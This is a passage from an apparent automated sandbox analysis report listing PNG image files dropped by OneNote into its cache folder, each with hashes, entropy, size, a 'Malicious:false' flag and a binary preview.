                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
